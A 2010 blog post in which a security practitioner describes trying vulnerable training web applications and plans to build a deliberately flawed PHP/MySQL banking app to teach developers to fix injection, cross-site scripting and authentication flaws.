Sunday, January 31, 2010

Bad Web Application

So this week I spent time playing around with vulnerable web applications from OWASP and Foundstone. Now I will admit that I only played with these applications for a couple of hours, but it got me thinking how to use these tools in my job. These tools are great for teaching how to perform web application penetration testing, but seem to lack a way to fix identified issues.

One responsibility I have is to work with my development team to write better code. Not being a developer by trade and hoping to make it interesting for them, I want to take the bad web app idea a step further. I want the developers to write code to fix my bad application, Ok I am going to write code to fix it but I want to teach them to write the code as well.

The first application is bad online banking system based on Linux, Apache, MySQL and PHP. I hope to have it completed in the next two months or so. I hope the application will be filled with injection flaws, cross site scripting issues, broken authentication and session management issues. These are the top 3 from OWASP Top 10 – 2010. Once I have the application “tested” I will post it online for others to use and learn from.

No comments:

Post a Comment

 
Site Meter